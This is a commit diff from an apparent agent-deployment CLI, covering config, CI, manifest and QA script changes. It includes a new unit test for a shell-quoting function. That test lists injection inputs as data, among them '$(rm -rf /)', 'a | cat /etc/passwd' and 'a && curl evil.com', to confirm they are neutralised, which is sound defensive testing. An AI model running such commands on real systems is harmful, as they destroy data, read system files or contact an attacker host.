feat: add Telegram and WhatsApp to OpenClaw setup picker

.claude/rules/agent-default-models.md

@@ -0,0 +1,23 @@
+# Agent Default Models
+
+**Source of truth for the default LLM each agent uses via OpenRouter.**
+When updating an agent's default model, update BOTH the code and this file. This prevents regressions from stale model IDs.
+
+Last verified: 2026-03-12
+
+| Agent | Default Model | How It's Set |
+|---|---|---|
+| Claude Code | _(routed by Anthropic)_ | `ANTHROPIC_BASE_URL=https://openrouter.ai/api` — model selection handled by Claude's own routing |
+| Codex CLI | `openai/gpt-5.3-codex` | Hardcoded in `setupCodexConfig()` → `~/.codex/config.toml` |
+| OpenClaw | `openrouter/openrouter/auto` | `modelDefault` field in agent config; written to OpenClaw config via `setupOpenclawConfig()` |
+| ZeroClaw | _(provider default)_ | `ZEROCLAW_PROVIDER=openrouter` — model selection handled by ZeroClaw's OpenRouter integration |
+| OpenCode | _(provider default)_ | `OPENROUTER_API_KEY` env var — model selection handled by OpenCode natively |
+| Kilo Code | _(provider default)_ | `KILO_PROVIDER_TYPE=openrouter` — model selection handled by Kilo Code natively |
+| Hermes | _(provider default)_ | `OPENAI_BASE_URL=https://openrouter.ai/api/v1` + `OPENAI_API_KEY` — model selection handled by Hermes |
+| Junie | _(provider default)_ | `JUNIE_OPENROUTER_API_KEY` — model selection handled by Junie natively |
+
+## When to update
+
+- When OpenRouter adds a newer version of a model (e.g., `gpt-5.1-codex` → `gpt-5.3-codex`)
+- When an agent changes its default provider integration
+- Verify the model ID exists on OpenRouter before committing: `curl -s https://openrouter.ai/api/v1/models | jq '.data[].id' | grep <model>`

.claude/rules/shell-scripts.md

@@ -25,10 +25,10 @@ macOS ships bash 3.2. All scripts MUST work on it:
 
 ## Use Bun + TypeScript for Inline Scripting — NEVER python/python3
 When shell scripts need JSON processing, HTTP calls, crypto, or any non-trivial logic:
-- **ALWAYS** use `bun eval '...'` or write a temp `.ts` file and `bun run` it
+- **ALWAYS** use `bun -e '...'` or write a temp `.ts` file and `bun run` it
 - **NEVER** use `python3 -c` or `python -c` for inline scripting — python is not a project dependency
-- Prefer `jq` for simple JSON extraction; fall back to `bun eval` when jq is unavailable
-- Pass data to bun via environment variables (e.g., `_DATA="${var}" bun eval "..."`) or temp files — never interpolate untrusted values into JS strings
+- Prefer `jq` for simple JSON extraction; fall back to `bun -e` when jq is unavailable
+- Pass data to bun via environment variables (e.g., `_DATA="${var}" bun -e "..."`) or temp files — never interpolate untrusted values into JS strings
 - For complex operations (SigV4 signing, API calls with retries), write a heredoc `.ts` file and `bun run` it
 
 ## ESM Only — NEVER use require() or CommonJS

.claude/skills/setup-agent-team/qa.sh

@@ -226,6 +226,29 @@ if [[ "${RUN_MODE}" == "e2e" ]]; then
     fi
 fi
 
+# --- Load Telegram credentials for soak mode ---
+if [[ "${RUN_MODE}" == "soak" ]]; then
+    if [[ -f /etc/spawn-qa-auth.env ]]; then
+        while IFS='=' read -r _tkey _tval || [[ -n "${_tkey}" ]]; do
+            _tkey="${_tkey#"${_tkey%%[! ]*}"}"
+            _tkey="${_tkey%"${_tkey##*[! ]}"}"
+            [[ -z "${_tkey}" || "${_tkey}" == \#* ]] && continue
+            case "${_tkey}" in
+                TELEGRAM_BOT_TOKEN|TELEGRAM_TEST_CHAT_ID|SOAK_CLOUD)
+                    export "${_tkey}=${_tval}"
+                    ;;
+            esac
+        done < /etc/spawn-qa-auth.env
+        if [[ -n "${TELEGRAM_BOT_TOKEN:-}" ]] && [[ -n "${TELEGRAM_TEST_CHAT_ID:-}" ]]; then
+            log "Telegram credentials loaded for soak test (cloud: ${SOAK_CLOUD:-sprite})"
+        else
+            log "WARNING: TELEGRAM_BOT_TOKEN or TELEGRAM_TEST_CHAT_ID missing from /etc/spawn-qa-auth.env — soak test will fail"
+        fi
+    else
+        log "WARNING: /etc/spawn-qa-auth.env not found — soak test requires TELEGRAM_BOT_TOKEN and TELEGRAM_TEST_CHAT_ID"
+    fi
+fi
+
 # Launch Claude Code with mode-specific prompt
 # Enable agent teams (required for team-based workflows)
 export CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1

.github/workflows/qa.yml

@@ -1,7 +1,8 @@
 name: QA
 on:
   schedule:
-    - cron: '0 */4 * * *'
+    - cron: '0 */4 * * *'   # Every 4 hours — quality sweep
+    - cron: '0 3 * * 1'     # Every Monday 3am UTC — Telegram soak test (OpenClaw on DigitalOcean)
   workflow_dispatch:
     inputs:
       reason:
@@ -24,7 +25,11 @@ jobs:
           SPRITE_URL: ${{ secrets.QA_SPRITE_URL }}
           TRIGGER_SECRET: ${{ secrets.QA_TRIGGER_SECRET }}
         run: |
-          REASON="${{ github.event.inputs.reason || 'schedule' }}"
+          if [ "${{ github.event_name }}" = "schedule" ] && [ "${{ github.event.schedule }}" = "0 3 * * 1" ]; then
+            REASON="soak"
+          else
+            REASON="${{ github.event.inputs.reason || 'schedule' }}"
+          fi
           curl -sS --fail-with-body -X POST \
             "${SPRITE_URL}/trigger?reason=${REASON}" \
             -H "Authorization: Bearer ${TRIGGER_SECRET}"

manifest.json

@@ -28,7 +28,7 @@
         }
       },
       "icon": "https://raw.githubusercontent.com/OpenRouterTeam/spawn/main/assets/agents/claude.png",
-      "featured_cloud": ["gcp", "aws", "digitalocean"],
+      "featured_cloud": ["digitalocean", "sprite"],
       "creator": "Anthropic",
       "repo": "anthropics/claude-code",
       "license": "Proprietary",
@@ -61,7 +61,7 @@
         }
       },
       "icon": "https://raw.githubusercontent.com/OpenRouterTeam/spawn/main/assets/agents/openclaw.png",
-      "featured_cloud": ["gcp", "aws", "digitalocean"],
+      "featured_cloud": ["digitalocean", "sprite"],
       "creator": "OpenClaw",
       "repo": "openclaw/openclaw",
       "license": "MIT",
@@ -99,7 +99,7 @@
       },
       "notes": "Rust-based agent framework built by Harvard/MIT/Sundai.Club communities. Natively supports OpenRouter via OPENROUTER_API_KEY + ZEROCLAW_PROVIDER=openrouter. Requires compilation from source (~5-10 min).",
       "icon": "https://raw.githubusercontent.com/OpenRouterTeam/spawn/main/assets/agents/zeroclaw.png",
-      "featured_cloud": ["hetzner", "gcp", "aws"],
+      "featured_cloud": ["digitalocean", "sprite"],
       "creator": "Sundai.Club",
       "repo": "zeroclaw-labs/zeroclaw",
       "license": "Apache-2.0",
@@ -126,7 +126,7 @@
       },
       "notes": "Works with OpenRouter via OPENAI_BASE_URL override pointing to openrouter.ai/api/v1",
       "icon": "https://raw.githubusercontent.com/OpenRouterTeam/spawn/main/assets/agents/codex.png",
-      "featured_cloud": ["gcp", "aws", "digitalocean"],
+      "featured_cloud": ["digitalocean", "sprite"],
       "creator": "OpenAI",
       "repo": "openai/codex",
       "license": "Apache-2.0",
@@ -151,7 +151,7 @@
       },
       "notes": "Natively supports OpenRouter via OPENROUTER_API_KEY env var. Go-based TUI using Bubble Tea.",
       "icon": "https://raw.githubusercontent.com/OpenRouterTeam/spawn/main/assets/agents/opencode.png",
-      "featured_cloud": ["gcp", "aws", "digitalocean"],
+      "featured_cloud": ["digitalocean", "sprite"],
       "creator": "SST",
       "repo": "sst/opencode",
       "license": "MIT",
@@ -178,7 +178,7 @@
       },
       "notes": "Natively supports OpenRouter as a provider via KILO_PROVIDER_TYPE=openrouter. CLI installable via npm as @kilocode/cli, invocable as 'kilocode' or 'kilo'.",
       "icon": "https://raw.githubusercontent.com/OpenRouterTeam/spawn/main/assets/agents/kilocode.png",
-      "featured_cloud": ["gcp", "aws", "digitalocean"],
+      "featured_cloud": ["digitalocean", "sprite"],
       "creator": "Kilo-Org",
       "repo": "Kilo-Org/kilocode",
       "license": "MIT",
@@ -205,7 +205,7 @@
       },
       "notes": "Natively supports OpenRouter via OPENROUTER_API_KEY. Also works via OPENAI_BASE_URL + OPENAI_API_KEY for OpenAI-compatible mode. Installs Python 3.11 via uv.",
       "icon": "https://raw.githubusercontent.com/OpenRouterTeam/spawn/main/assets/agents/hermes.png",
-      "featured_cloud": ["sprite", "hetzner", "gcp"],
+      "featured_cloud": ["digitalocean", "sprite"],
       "creator": "Nous Research",
       "repo": "NousResearch/hermes-agent",
       "license": "MIT",
@@ -231,7 +231,7 @@
       },
       "notes": "Natively supports OpenRouter via JUNIE_OPENROUTER_API_KEY. Subagent tasks may require GPT-4.1 Mini, GPT-4.1, or GPT-5 models to be enabled on your OpenRouter account.",
       "icon": "https://raw.githubusercontent.com/OpenRouterTeam/spawn/main/assets/agents/junie.png",
-      "featured_cloud": ["hetzner", "aws", "digitalocean"],
+      "featured_cloud": ["digitalocean", "sprite"],
       "creator": "JetBrains",
       "repo": "JetBrains/junie",
       "license": "Proprietary",

packages/cli/package.json

@@ -1,6 +1,6 @@
 {
   "name": "@openrouter/spawn",
-  "version": "0.16.15",
+  "version": "0.17.1",
   "type": "module",
   "bin": {
     "spawn": "cli.js"

packages/cli/src/__tests__/gcp-shellquote.test.ts

@@ -0,0 +1,71 @@
+import { describe, expect, it } from "bun:test";
+import { shellQuote } from "../shared/ui.js";
+
+describe("shellQuote", () => {
+  it("should wrap simple strings in single quotes", () => {
+    expect(shellQuote("hello")).toBe("'hello'");
+    expect(shellQuote("ls -la")).toBe("'ls -la'");
+  });
+
+  it("should escape embedded single quotes", () => {
+    expect(shellQuote("it's")).toBe("'it'\\''s'");
+    expect(shellQuote("a'b'c")).toBe("'a'\\''b'\\''c'");
+  });
+
+  it("should handle strings with no special characters", () => {
+    expect(shellQuote("simple")).toBe("'simple'");
+    expect(shellQuote("/usr/bin/env")).toBe("'/usr/bin/env'");
+  });
+
+  it("should safely quote shell metacharacters", () => {
+    expect(shellQuote("$(whoami)")).toBe("'$(whoami)'");
+    expect(shellQuote("`id`")).toBe("'`id`'");
+    expect(shellQuote("a; rm -rf /")).toBe("'a; rm -rf /'");
+    expect(shellQuote("a | cat /etc/passwd")).toBe("'a | cat /etc/passwd'");
+    expect(shellQuote("a && curl evil.com")).toBe("'a && curl evil.com'");
+    expect(shellQuote("${HOME}")).toBe("'${HOME}'");
+  });
+
+  it("should handle double quotes inside single-quoted string", () => {
+    expect(shellQuote('echo "hello"')).toBe("'echo \"hello\"'");
+  });
+
+  it("should handle empty string", () => {
+    expect(shellQuote("")).toBe("''");
+  });
+
+  it("should reject null bytes (defense-in-depth)", () => {
+    expect(() => shellQuote("hello\x00world")).toThrow("null bytes");
+    expect(() => shellQuote("\x00")).toThrow("null bytes");
+    expect(() => shellQuote("cmd\x00; rm -rf /")).toThrow("null bytes");
+  });
+
+  it("should handle strings with newlines", () => {
+    const result = shellQuote("line1\nline2");
+    expect(result).toBe("'line1\nline2'");
+  });
+
+  it("should handle strings with tabs", () => {
+    const result = shellQuote("col1\tcol2");
+    expect(result).toBe("'col1\tcol2'");
+  });
+
+  it("should handle backslashes", () => {
+    expect(shellQuote("a\\b")).toBe("'a\\b'");
+  });
+
+  it("should handle multiple consecutive single quotes", () => {
+    expect(shellQuote("''")).toBe("''\\'''\\'''");
+  });
+
+  it("should produce output that is safe for bash -c", () => {
+    // Verify the quoting pattern: the result, when interpreted by bash,
+    // should yield the original string without executing anything
+    const dangerous = "$(rm -rf /)";
+    const quoted = shellQuote(dangerous);
+    // The quoted string wraps in single quotes, preventing expansion
+    expect(quoted).toBe("'$(rm -rf /)'");
+    expect(quoted.startsWith("'")).toBe(true);
+    expect(quoted.endsWith("'")).toBe(true);
+  });
+});

packages/cli/src/__tests__/icon-integrity.test.ts

@@ -57,7 +57,6 @@ describe("Icon Integrity", () => {
       });
 
       it(`${id}.png is actual PNG data`, () => {
-        expect(existsSync(pngPath)).toBe(true);
         expect(isPng(pngPath)).toBe(true);
       });
 
@@ -94,7 +93,6 @@ describe("Icon Integrity", () => {
       });
 
       it(`${id}.png is actual PNG data`, () => {
-        expect(existsSync(pngPath)).toBe(true);
         expect(isPng(pngPath)).toBe(true);
       });